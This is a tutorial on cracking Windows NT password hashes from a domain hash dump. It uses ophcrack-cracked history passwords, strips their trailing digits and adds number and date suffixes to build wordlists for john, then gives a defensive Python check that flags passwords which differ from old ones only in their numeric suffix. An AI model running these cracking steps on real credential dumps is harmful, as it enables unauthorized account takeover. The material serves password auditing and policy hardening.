Let's assume we used ophcrack to crack NT hashes from a pwdump-format file that also contains the password history hashes, and that several of the history hashes have been cracked.
Steps for getting more passwords cracked (assuming users just increase, decrease or otherwise edit the numbers at the end of their passwords on every policy-forced password change):
- Get cracked passwords (including history):
grep -v ':::$' ophcrack.pwdump | awk -F: '{ print $7 }' | sort -u > wordlist_ophcracked.txt   # field 7 is the NT cleartext in ophcrack's saved pwdump; uncracked entries end in ':::'
- Feed it to john (this directly catches active passwords that are identical to a cracked history entry):
john secretsdump.ntds.pwdump --format=nt --wordlist=wordlist_ophcracked.txt
- Strip the numbers at the end (all-digit passwords reduce to an empty line, so drop those):
sed -e 's/[0-9]*$//' wordlist_ophcracked.txt | grep -v '^$' | sort -u > wordlist_ophcracked_base.txt
- Generate some common patterns (feel free to include more):
seq 1 1000 > num_1.txt
seq -f '%04g' 1 9999 > num_2.txt
seq -f '%02g' 1 99 > num_3.txt
for i in $(seq 0 365) ; do date --date "2000-01-01 +$i day" +'%m%d' ; done > num_4.txt   # 2000 is a leap year, so this yields every MMDD from 0101 to 1231, including 0229
cat num_*.txt | sort -u > num.txt
- Combine the number patterns with the base words (could be slow, but at least it is a one-liner :) ):
while read -r w ; do while read -r n ; do echo "$w$n" ; done < num.txt ; done < wordlist_ophcracked_base.txt > wordlist_ophcracked_combined.txt
- Attack the hashes with the combined wordlist:
john secretsdump.ntds.pwdump --format=nt --wordlist=wordlist_ophcracked_combined.txt
The result should include many more cracked passwords, not only history entries but active passwords as well.
That's all about forced password change by policy and user behaviour.
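The same "strip the trailing digits" rule that drives the attack above is just as useful on the defending side: a password-change filter or a post-audit report can flag every new password that is merely an old one with its numeric suffix edited. The following Python is an added example written for this page, not code from the original write-up or from ophcrack/john; the account data it runs on is constructed for the demonstration.

```python
import re
from typing import Dict, Iterable, List, Optional, Tuple

# Same normalisation as the sed 's/[0-9]*$//' step: drop the trailing digits.
TRAILING_DIGITS = re.compile(r"\d+$")


def base_form(password: str) -> str:
    """Return the password with its trailing digits removed ('Winter2024' -> 'Winter')."""
    return TRAILING_DIGITS.sub("", password)


def is_trivial_variant(candidate: str, previous: Iterable[str]) -> bool:
    """True if candidate only differs from some previous password in its numeric suffix.

    The comparison of the base is case-insensitive ('Sunshine01' vs 'sunshine'),
    so a capitalisation change does not hide the reuse.  An all-digit password has
    an empty base; for those only an exact match counts, otherwise any two PIN-like
    passwords would be reported as variants of each other.
    """
    cand_base = base_form(candidate).casefold()
    for old in previous:
        if candidate == old:
            return True
        old_base = base_form(old).casefold()
        if cand_base and cand_base == old_base:
            return True
    return False


def audit(accounts: Dict[str, Tuple[Optional[str], List[str]]]) -> Dict[str, List[str]]:
    """Report users whose active cleartext is a suffix variant of a history entry.

    accounts maps user -> (active cleartext or None if uncracked, list of cracked
    history cleartexts).  Returns user -> the history entries that matched.
    """
    findings: Dict[str, List[str]] = {}
    for user, (active, history) in accounts.items():
        if active is None:
            continue  # nothing to compare; the active hash was not cracked
        matches = [old for old in history if is_trivial_variant(active, [old])]
        if matches:
            findings[user] = matches
    return findings


# Constructed sample data (hypothetical users and passwords), as a password audit
# would have it after cracking both active and history hashes.
SAMPLE_ACCOUNTS: Dict[str, Tuple[Optional[str], List[str]]] = {
    "alice": ("Winter2024", ["Winter2022", "Winter2023"]),  # yearly increment
    "bob": ("Tr0ub4dor&3", ["correcthorse"]),              # genuinely new password
    "carol": ("Sunshine01", ["sunshine"]),                 # case change plus digits
    "dave": ("20240101", ["20230101"]),                    # all digits: not flagged by the base rule
    "erin": (None, ["Welcome1"]),                          # active hash not cracked
}


def summary(accounts: Dict[str, Tuple[Optional[str], List[str]]]) -> Tuple[int, int]:
    """Return (cracked active passwords, how many of them are history variants)."""
    cracked = sum(1 for active, _ in accounts.values() if active is not None)
    return cracked, len(audit(accounts))


if __name__ == "__main__":
    for user, matches in audit(SAMPLE_ACCOUNTS).items():
        print(f"{user}: active password is a numeric-suffix variant of {matches}")
    cracked, variants = summary(SAMPLE_ACCOUNTS)
    print(f"{variants} of {cracked} cracked active passwords derive from a history entry")
```

Run inside a password-change hook, `is_trivial_variant(new_password, history_cleartexts)` is the policy check that makes the "increment the number" habit fail at change time; run over an audit's output, `audit()` gives the number that justifies tightening the policy in the first place.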